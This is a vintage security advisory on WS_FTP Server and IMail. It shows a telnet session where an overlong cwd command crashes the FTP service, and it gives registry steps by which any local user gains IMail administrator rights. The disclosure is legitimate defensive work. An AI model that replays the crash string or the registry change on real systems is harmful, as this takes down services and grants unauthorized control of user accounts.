COMMAND

    WS_FTP Server

SYSTEMS AFFECTED

    WS_FTP Server Version 1.0.1.E/1.0.2.E

PROBLEM

    Following is based on eEye Digital Security Team Advisory.   While
    running Retina against more  server applications eYe found  WS_FTP
    Server to stop  responding to our  scans. The following  are their
    findings.   WS_FTP  Server  can  not  handle  a cwd command with a
    string longer then 876 characters appended to it.

        telnet server.com 21
        220-SERV X2 WS_FTP Server 1.0.2.EVAL (728964122)
        220-Sat Jan 30 15:25:10 1999
        220-30 days remaining on evaluation.
        220 SERV X2 WS_FTP Server 1.0.2.EVAL (728964122)
        user ftp
        331 Password required
        pass ftp
        230 user logged in
        cwd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAA
        Connection to host lost.

    The iFtpSvc.exe (Server Exe) process has now exited and  therefore
    the  WS_FTP  Server  will  no  longer  respond.  There is no error
    displayed on screen nor is the event log written to.  The smallest
    amount of  characters needed  it 876.   So sending  "cwd b"  where
    b > 875  will crash the  remote server.   Also, WS_FTP Server  and
    IMail do  not store  user database  information "securely."   Some
    might think the following is not a hole nor a problem (depends  on
    how much security  matters).  WS_FTP  Server and IMail  both store
    user information in the registry  insecurely making it easy for  a
    local attack  in which  any user  can gain  IMail /  WS_FTP Server
    administrator permissions.   Each user  profile is  stored in  the
    following key.

        HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\HASTE\Users\Marc

    Where Marc is the name of  the user account and HASTE is  the name
    of the machine.  The security permissions on the key are:

        Query Value
        Set Value
        Create Subkey
        Enumerate Subkeys
        Notify
        Delete
        Read Control

    There is a section in the key called "flags."  This is the section
    that holds the rights of the  user. When the key is set  to "1920"
    you will have  Administrator Access to  IMail.  So  to sum it  all
    up we do the following.  We change the flags key to equal 1920 and
    then we use the IMail Web Administration Interface to do  anything
    to any IMail  user. I.E. Create  accounts, delete accounts,  etc..
    This is a local attack.

SOLUTION

    The problem above is corrected and the first update of the  WS_FTP
    Server has been in testing for around three weeks.  All registered
    users of WS_FTP Server will be automatically notified when this is
    released and will be able to update for free.